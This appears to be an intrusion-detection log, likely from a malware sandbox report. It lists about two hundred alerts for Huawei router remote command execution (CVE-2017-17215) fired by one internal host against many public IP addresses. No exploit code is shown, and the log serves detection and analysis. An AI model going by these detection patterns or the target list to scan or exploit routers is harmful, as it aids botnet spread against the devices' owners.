                                                    07/10/24-08:27:19.330211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5157237215192.168.2.14197.50.137.120
                                                    07/10/24-08:27:19.161022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3958237215192.168.2.14148.163.134.18
                                                    07/10/24-08:26:55.393096TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4461237215192.168.2.14197.62.188.138
                                                    07/10/24-08:27:33.854802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5373037215192.168.2.1441.147.39.23
                                                    07/10/24-08:27:30.482034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4085437215192.168.2.14197.9.86.122
                                                    07/10/24-08:27:07.371632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4638837215192.168.2.14157.248.191.16
                                                    07/10/24-08:26:43.631742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3779637215192.168.2.14200.59.203.117
                                                    07/10/24-08:26:43.543257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4488037215192.168.2.14197.118.62.131
                                                    07/10/24-08:26:59.754191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4716637215192.168.2.14184.10.79.180
                                                    07/10/24-08:27:33.734859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3592837215192.168.2.14197.199.11.236
                                                    07/10/24-08:26:42.455188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5081037215192.168.2.14157.244.109.235
                                                    07/10/24-08:27:02.994368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4355637215192.168.2.14139.142.0.213
                                                    07/10/24-08:27:05.173254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4240837215192.168.2.14197.101.235.78
                                                    07/10/24-08:27:30.515312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3796637215192.168.2.1467.57.50.70
                                                    07/10/24-08:26:33.204565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3781637215192.168.2.1441.15.148.104
                                                    07/10/24-08:27:19.251231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4927637215192.168.2.14197.87.128.119
                                                    07/10/24-08:26:15.831289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3950037215192.168.2.14220.26.205.204
                                                    07/10/24-08:27:08.323465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3361437215192.168.2.1427.197.152.46
                                                    07/10/24-08:27:10.772266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4824437215192.168.2.14157.55.182.75
                                                    07/10/24-08:26:51.994858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5602837215192.168.2.14197.41.121.215
                                                    07/10/24-08:26:49.864771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5662037215192.168.2.14162.60.18.54
                                                    07/10/24-08:26:47.920387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5734837215192.168.2.14157.35.211.247
                                                    07/10/24-08:26:38.551619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4157837215192.168.2.14157.50.184.123
                                                    07/10/24-08:26:43.526771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3405437215192.168.2.1441.11.131.74
                                                    07/10/24-08:26:51.975524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4492637215192.168.2.14135.179.56.190
                                                    07/10/24-08:27:14.878882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4156437215192.168.2.1441.232.129.177
                                                    07/10/24-08:27:05.104096TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4972037215192.168.2.1441.15.99.119
                                                    07/10/24-08:27:30.466887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4959437215192.168.2.1441.57.55.33
                                                    07/10/24-08:26:17.990229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4320437215192.168.2.14100.204.7.29
                                                    07/10/24-08:27:02.722958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4571237215192.168.2.14157.254.73.96
                                                    07/10/24-08:26:26.602369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4071637215192.168.2.14157.104.161.167
                                                    07/10/24-08:26:14.807023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3611437215192.168.2.14157.101.211.248
                                                    07/10/24-08:27:31.553494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5417637215192.168.2.14197.176.0.210
                                                    07/10/24-08:26:28.728231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4930637215192.168.2.14157.153.164.86
                                                    07/10/24-08:26:49.775656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5422037215192.168.2.1441.156.123.175
                                                    07/10/24-08:26:59.860909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3578237215192.168.2.14197.95.56.92
                                                    07/10/24-08:27:33.854802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5287237215192.168.2.14212.78.139.248
                                                    07/10/24-08:26:36.365413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3887637215192.168.2.1441.206.134.136
                                                    07/10/24-08:27:08.443161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5418237215192.168.2.14216.190.248.205
                                                    07/10/24-08:27:22.794160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5274637215192.168.2.1441.192.176.232
                                                    07/10/24-08:26:29.880668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3891037215192.168.2.1441.250.160.185
                                                    07/10/24-08:27:02.831621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5410637215192.168.2.14197.14.253.87
                                                    07/10/24-08:26:25.525521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4590437215192.168.2.14157.98.21.160
                                                    07/10/24-08:27:05.102101TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4573037215192.168.2.14197.104.144.42
                                                    07/10/24-08:26:52.066193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3342437215192.168.2.14105.131.224.137
                                                    07/10/24-08:27:33.848212TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6092237215192.168.2.1441.0.252.101
                                                    07/10/24-08:26:41.540257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4313637215192.168.2.14197.129.106.226
                                                    07/10/24-08:27:05.135753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5125237215192.168.2.14156.74.217.86
                                                    07/10/24-08:27:11.480663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4461037215192.168.2.1441.79.146.175
                                                    07/10/24-08:27:14.026878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5395037215192.168.2.14157.153.68.134
                                                    07/10/24-08:27:19.301991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4611237215192.168.2.1441.99.204.159
                                                    07/10/24-08:26:23.350374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3597037215192.168.2.14149.134.213.25
                                                    07/10/24-08:26:28.910325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5621637215192.168.2.1420.0.113.170
                                                    07/10/24-08:26:52.078172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3995637215192.168.2.14157.169.68.228
                                                    07/10/24-08:26:29.852071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4668437215192.168.2.14111.177.245.238
                                                    07/10/24-08:27:33.961510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5704637215192.168.2.1441.27.14.213
                                                    07/10/24-08:27:13.977821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4312237215192.168.2.14197.133.117.37
                                                    07/10/24-08:26:28.743244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4476237215192.168.2.1441.207.221.78
                                                    07/10/24-08:27:13.721350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3482437215192.168.2.14157.39.81.138
                                                    07/10/24-08:26:41.421188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5984837215192.168.2.1441.34.43.14
                                                    07/10/24-08:27:22.810849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5744037215192.168.2.14157.24.227.58
                                                    07/10/24-08:26:23.355278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4784837215192.168.2.148.248.213.218
                                                    07/10/24-08:26:43.713774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5455637215192.168.2.14129.162.77.45
                                                    07/10/24-08:26:14.777046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3606637215192.168.2.1441.224.219.120
                                                    07/10/24-08:27:05.121816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5819637215192.168.2.14157.163.124.69
                                                    07/10/24-08:26:14.811760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4938637215192.168.2.14157.163.200.243
                                                    07/10/24-08:26:18.008583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3424837215192.168.2.1470.117.95.29
                                                    07/10/24-08:26:36.392323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6012837215192.168.2.14157.154.9.4
                                                    07/10/24-08:26:29.879132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5318237215192.168.2.1441.76.123.11
                                                    07/10/24-08:27:23.792966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3883837215192.168.2.14157.30.77.44
                                                    07/10/24-08:27:17.092016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5482437215192.168.2.14197.224.145.183
                                                    07/10/24-08:27:28.169607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4153437215192.168.2.14102.66.138.160
                                                    07/10/24-08:27:02.772375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3881237215192.168.2.148.213.96.54
                                                    07/10/24-08:27:05.159801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3989037215192.168.2.14157.187.57.38
                                                    07/10/24-08:26:28.789365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4514837215192.168.2.14146.6.160.127
                                                    07/10/24-08:27:05.239368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3989237215192.168.2.14178.196.63.42
                                                    07/10/24-08:27:13.963360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4553037215192.168.2.14211.145.192.146
                                                    07/10/24-08:27:30.450144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5700637215192.168.2.14197.174.93.172
                                                    07/10/24-08:26:42.367080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4317437215192.168.2.1443.253.213.147
                                                    07/10/24-08:26:47.835000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5399437215192.168.2.14157.101.151.241
                                                    07/10/24-08:27:02.966224TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4047637215192.168.2.14157.176.204.55
                                                    07/10/24-08:27:17.072701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4868037215192.168.2.14157.9.218.117
                                                    07/10/24-08:26:47.976688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3645037215192.168.2.1441.58.178.203
                                                    07/10/24-08:26:33.249183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5518037215192.168.2.14197.116.116.172
                                                    07/10/24-08:26:59.666113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6056237215192.168.2.1492.165.118.199
                                                    07/10/24-08:27:27.155476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5080837215192.168.2.14197.59.60.30
                                                    07/10/24-08:26:11.610519TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3428637215192.168.2.1441.254.114.42
                                                    07/10/24-08:26:25.469332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5676637215192.168.2.1441.157.222.98
                                                    07/10/24-08:27:23.930240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5641237215192.168.2.14194.46.23.82
                                                    07/10/24-08:26:11.624823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4320637215192.168.2.14144.199.200.170
                                                    07/10/24-08:26:15.842183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4401637215192.168.2.14197.81.189.215
                                                    07/10/24-08:27:33.778513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5688037215192.168.2.14157.20.121.141
                                                    07/10/24-08:27:24.989466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4168037215192.168.2.14197.144.168.184
                                                    07/10/24-08:27:22.487883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5019837215192.168.2.14197.18.23.165
                                                    07/10/24-08:27:30.529525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4704837215192.168.2.1441.250.144.224
                                                    07/10/24-08:26:22.281648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5422037215192.168.2.1441.247.134.230
                                                    07/10/24-08:26:15.819224TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3920637215192.168.2.14157.117.75.243
                                                    07/10/24-08:26:36.382964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4309237215192.168.2.1441.25.204.103
                                                    07/10/24-08:26:48.032433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6032437215192.168.2.1437.254.125.57
                                                    07/10/24-08:27:22.498081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3714037215192.168.2.14197.84.224.253
                                                    07/10/24-08:26:43.752339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4049837215192.168.2.14157.191.201.191
                                                    07/10/24-08:26:15.823629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3865237215192.168.2.1441.23.24.120
                                                    07/10/24-08:27:19.312815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4105837215192.168.2.14136.168.22.40
                                                    07/10/24-08:26:36.422019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5961637215192.168.2.14197.136.173.146
                                                    07/10/24-08:27:33.931783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4579237215192.168.2.14197.83.55.238
                                                    07/10/24-08:26:13.835894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5733237215192.168.2.14190.23.119.116
                                                    07/10/24-08:27:13.836090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4079437215192.168.2.14197.206.128.130
                                                    07/10/24-08:27:33.755153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5454437215192.168.2.14197.104.88.153
                                                    07/10/24-08:26:52.083078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5477437215192.168.2.1432.51.80.210
                                                    07/10/24-08:26:59.716127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5637437215192.168.2.14107.175.229.225
                                                    07/10/24-08:26:55.428657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4354237215192.168.2.14157.190.202.229
                                                    07/10/24-08:26:33.206981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4354837215192.168.2.1441.219.120.153
                                                    07/10/24-08:27:07.344618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4528637215192.168.2.14197.154.113.135
                                                    07/10/24-08:26:23.333013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3738437215192.168.2.14157.241.122.244
                                                    07/10/24-08:27:22.483673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5733437215192.168.2.1431.35.208.112
                                                    07/10/24-08:26:31.075999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4144037215192.168.2.14197.98.36.176
                                                    07/10/24-08:27:32.591904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4649837215192.168.2.14197.62.152.196
                                                    07/10/24-08:26:36.381629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5708837215192.168.2.1441.205.95.204
                                                    07/10/24-08:27:20.414993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3575037215192.168.2.1441.134.202.145
                                                    07/10/24-08:26:43.842656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4916837215192.168.2.14157.183.129.21
                                                    07/10/24-08:26:23.302644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5893037215192.168.2.1441.23.58.99
                                                    07/10/24-08:27:02.766383TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4114037215192.168.2.14157.232.76.11
                                                    07/10/24-08:27:24.883721TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5327437215192.168.2.1441.89.203.104
                                                    07/10/24-08:26:31.081032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4770837215192.168.2.14157.30.185.223
                                                    07/10/24-08:27:20.474239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4348237215192.168.2.14157.51.254.115
                                                    07/10/24-08:26:53.210553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5745837215192.168.2.14118.12.132.8
                                                    07/10/24-08:27:28.162880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5792837215192.168.2.14165.147.112.207
                                                    07/10/24-08:27:33.904086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4214637215192.168.2.14197.75.249.1
                                                    07/10/24-08:26:31.074036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3687437215192.168.2.14197.71.162.11
                                                    07/10/24-08:26:33.156577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6017237215192.168.2.1452.61.239.85
                                                    07/10/24-08:27:22.539034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5126637215192.168.2.1441.178.254.36
                                                    07/10/24-08:27:14.835457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5443237215192.168.2.14157.165.218.182
                                                    07/10/24-08:27:08.371486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3695237215192.168.2.14194.40.216.219
                                                    07/10/24-08:26:11.144714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5493637215192.168.2.14157.212.90.236
                                                    07/10/24-08:26:43.662238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5647237215192.168.2.1441.147.148.104
                                                    07/10/24-08:27:19.211343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3761237215192.168.2.1441.205.80.129
                                                    07/10/24-08:26:57.654674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3761237215192.168.2.14113.157.86.99
                                                    07/10/24-08:26:14.822154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5643237215192.168.2.14157.90.179.156
                                                    07/10/24-08:26:59.771791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4463037215192.168.2.1441.71.208.243
                                                    07/10/24-08:26:41.446265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5518637215192.168.2.14107.19.128.219
                                                    07/10/24-08:27:02.949585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3689437215192.168.2.14164.235.59.149
                                                    07/10/24-08:26:57.679549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4318437215192.168.2.1441.20.117.14
                                                    07/10/24-08:27:31.562174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3575237215192.168.2.1441.119.215.253
                                                    07/10/24-08:26:14.623389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5496437215192.168.2.1441.79.104.100
                                                    07/10/24-08:26:52.021127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5500037215192.168.2.14197.17.109.242
                                                    07/10/24-08:26:23.308313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5239637215192.168.2.14141.252.167.15
                                                    07/10/24-08:26:22.240968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3861237215192.168.2.1441.221.59.192
                                                    07/10/24-08:26:31.072676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3329837215192.168.2.14197.104.146.110
                                                    07/10/24-08:26:59.834186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5626437215192.168.2.14153.120.50.62
                                                    07/10/24-08:26:17.947291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4366237215192.168.2.14197.217.195.195
                                                    07/10/24-08:26:28.741388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5165037215192.168.2.14157.165.132.160
                                                    07/10/24-08:27:17.053274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5748837215192.168.2.14138.188.112.88
                                                    07/10/24-08:27:30.492853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4131237215192.168.2.14197.204.168.242
                                                    07/10/24-08:26:25.441344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3928637215192.168.2.14197.134.228.75
                                                    07/10/24-08:26:58.519894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4351237215192.168.2.14208.227.217.40
                                                    07/10/24-08:26:59.801277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6072637215192.168.2.14197.221.22.192
                                                    07/10/24-08:27:19.293782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5152237215192.168.2.1441.7.111.176
                                                    07/10/24-08:26:15.879292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4486237215192.168.2.14197.82.176.188
                                                    07/10/24-08:26:59.579530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5117037215192.168.2.14197.247.234.114
                                                    07/10/24-08:26:59.686618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4564837215192.168.2.14157.111.128.250
                                                    07/10/24-08:27:30.529123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5349837215192.168.2.1424.196.193.195
                                                    07/10/24-08:26:41.360429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4682037215192.168.2.14197.5.38.250
                                                    07/10/24-08:27:31.559678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3298037215192.168.2.14195.74.184.176
                                                    07/10/24-08:26:45.619678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3969237215192.168.2.1441.101.99.129
                                                    07/10/24-08:26:15.860013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4852037215192.168.2.1482.85.196.23
                                                    07/10/24-08:27:20.407027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3477837215192.168.2.1441.68.186.241
                                                    07/10/24-08:26:55.278007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3292037215192.168.2.1441.94.250.3
                                                    07/10/24-08:27:24.946656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3609637215192.168.2.1441.73.10.169
                                                    07/10/24-08:26:49.821091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3791637215192.168.2.1414.131.254.97
                                                    07/10/24-08:26:57.667686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5079837215192.168.2.1441.236.117.29
                                                    07/10/24-08:27:20.412517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3712037215192.168.2.14197.128.160.139
                                                    07/10/24-08:26:49.842206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5547037215192.168.2.1441.28.225.140
                                                    07/10/24-08:27:22.532375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5891037215192.168.2.14157.19.15.34
                                                    07/10/24-08:27:24.942132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3670837215192.168.2.14157.140.209.200
                                                    07/10/24-08:26:45.656539TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3540837215192.168.2.1441.56.95.64
                                                    07/10/24-08:27:17.044301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4106837215192.168.2.1441.239.119.51
                                                    07/10/24-08:27:20.476288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5617837215192.168.2.14191.61.28.199
                                                    07/10/24-08:27:30.478921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3386637215192.168.2.1441.111.69.65
                                                    07/10/24-08:27:16.996210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5862437215192.168.2.14197.101.126.159
                                                    07/10/24-08:26:36.433898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4176037215192.168.2.14218.126.44.163
                                                    07/10/24-08:26:41.615140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4105837215192.168.2.1441.72.1.220
                                                    07/10/24-08:26:48.013030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4942037215192.168.2.1437.68.78.18
                                                    07/10/24-08:27:30.519410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3292837215192.168.2.1482.73.17.96
                                                    07/10/24-08:26:47.840921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5277237215192.168.2.1441.141.19.45
                                                    07/10/24-08:27:02.811605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4493637215192.168.2.14197.20.5.177
                                                    07/10/24-08:26:55.457969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941037215192.168.2.14197.115.184.253
